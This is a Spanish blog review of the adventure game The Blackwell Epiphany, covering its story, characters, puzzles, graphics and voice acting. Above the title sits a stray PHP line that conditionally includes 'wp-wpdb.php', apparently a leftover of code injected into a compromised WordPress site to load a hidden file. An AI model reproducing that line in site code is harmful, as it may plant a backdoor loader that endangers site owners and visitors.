if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis The Blackwell Epiphany – La Fortaleza de LeChuck

Análisis The Blackwell Epiphany

The Blackwell Epiphany forma parte de la serie Blackwell, unas aventuras gráficas point and click publicadas por el estudio Wadjet Eye Games. El creador de la saga es Dave Gilbert (con ese apellido ya apuntaba maneras), quien ha creado desde 2006 hasta 2011 cuatro grandes aventuras: The Blackwell Legacy, Blackwell Unbound, Blackwell Convergence, y Blackwell Deception. La quinta y última parte nos llega hoy, su nombre es The Blackwell Epiphany, la cual pone el broche de oro a estas historias fantasmales.

The_Blackwell_Epiphany

Durante toda la saga Blackwell hemos vivido las aventuras de Rosangela Blackwell, una joven escritora y medium, y Joey Mallone, un dicharachero espectro y compañero de trabajo. Ambos ayudan a fantasmas a regresar a su mundo. En The Blackwell Epiphany, el detective Sam Durkin ha citado a la pareja delante de una vivienda abandonada para investigar un extraño suceso. Después de media hora de espera bajo unas temperaturas heladas, Durkin informa que no podrá asistir y que investiguen por su cuenta. Al adentrarse en el lugar, descubren el fantasma de una desdichada joven que se resiste a abandonar el mundo de los vivos. Esto es solo el comienzo de una serie de casos fantasmales conectados entre sí que tocarán muy de cerca a nuestros protagonistas.

The_Blackwell_Epiphany_2
La extraña pareja: Rosa y Joey

A pesar de que The Blackwell Epiphany forma parte de una saga, no es totalmente indispensable jugar a títulos anteriores para disfrutarlo, ya que trata casos distintos y las referencias al pasado de los protagonistas y anteriores juegos son recordados y narrados para situar a recién llegados. De todas formas, y como imaginaréis, es preferible jugarlos en orden y así conocer en profundidad los orígenes de Rosa, Joey y sus ancestros. Si decidís adentraros en la saga con The Blackwell Epiphany, no os preocupéis, al terminarlo tendréis la irremediable necesidad de jugarlos todos.

The_Blackwell_Epiphany_5

En The Blackwell Epiphany tomaremos el control de Rosa y Joey, y podremos cambiar entre uno y otro desde el menú superior o pulsando tabulador. Cada protagonista tiene sus ventajas, por un lado tenemos al fantasma Joey, que al ser incorpóreo tiene el poder de traspasar paredes y la habilidad de «soplar». Por otro lado está Rosa, la que interactúa con objetos y personajes gracias a la valiosa información que le proporciona Joey. El carácter serio y frío de Rosa choca a menudo con el irónico y animado de Joey, dando lugar a muchos momentos divertidos. Los comandos de este juego son simples, botón izquierdo intectuar con objetos/caminar y botón derecho mirar. Si estamos con Joey, y sin querer vamos haciendo click izquierdo sobre objetos, nos recordará de múltiples maneras la «transparencia» de los fantasmas. También es divertido ver la reacción de Joey ante objetos que no existían en su época, como los ordenadores y consolas.

The_Blackwell_Epiphany_6

Sin duda la relación de Rosa y Joey tiene química y engancha, con un gran número de conversaciones inteligentes, cantidades industriales de sarcasmo, manías individuales y la particular relación de amor-odio que se procesan. En cada pantalla podemos charlar sobre temas relacionados con el entorno, los personajes y la situación en la que nos encontramos. Esto último es a modo de pista para saber por dónde continuar. También serán muy entretenidos y emocionantes los diálogos que mantenemos con los personajes secundarios. Recuerdo lo que me reí en la pantalla del gimnasio, cuando Joey está hablando con un fantasma y éste ve a Rosa y la toma con ella. Cada vez que fallamos el puzle de dicho lugar, seguirá increpándola, indignando cada vez más a Rosa. También tendremos una gran dosis de momentos en que se nos pondrá el corazón en un puño con las historias dramáticas que nos relatan otros espectros y con los reencuentros de personajes de otras entregas. ¡Y hasta aquí puedo leer!

The_Blackwell_Epiphany_3
Vaya, hemos metido a Joey en su tienda favorita

En las últimas aventuras gráficas que he analizado, me he cansado de relatar lo absurdamente fácil de sus puzles, sin desafíos para el aventurero experimentado. En cambio, para alegría de muchos, en esta aventura tendremos que tomarnos nuestro tiempo antes de hacer el próximo movimiento. La típica mecánica de las aventuras gráficas, sumado al uso de dos personajes y la búsqueda de información en nuestro móvil y notas, abre un gran abanico de posibilidades a la hora de resolver enigmas. La era de los smartphones y sus múltiples funciones ha llegado de forma contundente a las aventuras gráficas.

He leído últimamente quejas de la sobresaturación de juegos indies con gráficos retro, clásicos, pixelados, como queráis llamarlos. Wadjet Eye Games se caracteriza por lanzar aventuras gráficas estilo old school y, como ya expliqué en Gemini Rue, esta estética no influye en los detalles de los entornos, ni tampoco en la emoción que trasmiten sus personajes. Sin duda prefiero estos gráficos antes que otros más espectaculares pero que fallan en aspectos como las animaciones, algo que últimamente me estoy encontrando demasiado.

También quería dedicar unas líneas a hablar del sonido. Es notable el esfuerzo que se ha puesto en The Blackwell Epiphany en este apartado. Todas las pantallas tienen su propia música, en ocasiones con aroma del pasado y en otras más relacionada con los tiempos modernos. Todos los temas de la OST hacen que nos impliquemos emocionalmente en la historia. Mención especial al increíble equipo de dobladores que ha ejecutado de forma espectacular sus líneas de texto, ¡parece que esos seres pixelados tengan vida! Tan solo con escucharlos podemos sentir por lo que están pasando. Brillante. Por cierto, Dave Gilbert hace varios «cameos» a nivel vocal.

The_Blackwell_Epiphany_4
Retro y precioso

Uno de los bonitos detalles que incluye el juego son los comentarios del creador, es maravilloso escuchar mientras juegas las anécdotas de cada escena o incluso las tomas falsas de los actores de voz. Se puede activar y desactivar en cualquier momento para mayor comodidad. Después de pasarme el juego, como había realizado muchos savegames, volví atrás para escuchar todas esas curiosidades durante el desarrollo del juego. Es muy especial escuchar a David comentar detalles e ideas y cómo ha ido plasmándolas, sobre todo en el desenlace.

Al acabar The Blackwell Epiphany sentí un vacío en mi interior, algo que solo me pasa con obras que me han llenado de tal manera que dejan un hueco irremplazable, y quizá la única forma de llenarlo es volviendo al principio, donde empezó todo. The Blackwell Epiphany y su saga es una maravilla que ningún aventurero debería perderse. Solo puedo encontrarle una pega, y no es otra que el idioma: está totalmente en inglés, y con la gran cantidad de texto y temas paranormales quizá se os escapen cosas. Os puedo decir que mi inglés es bastante básico y pude entender casi todo sin problemas. De todas formas, y como ya pasó en las otras partes, seguro que algún fan desinteresado lanza un parche en español.

The Blackwell Epiphany está esperándote en Steam a un precio de 14,99€, y vale cada céntimo invertido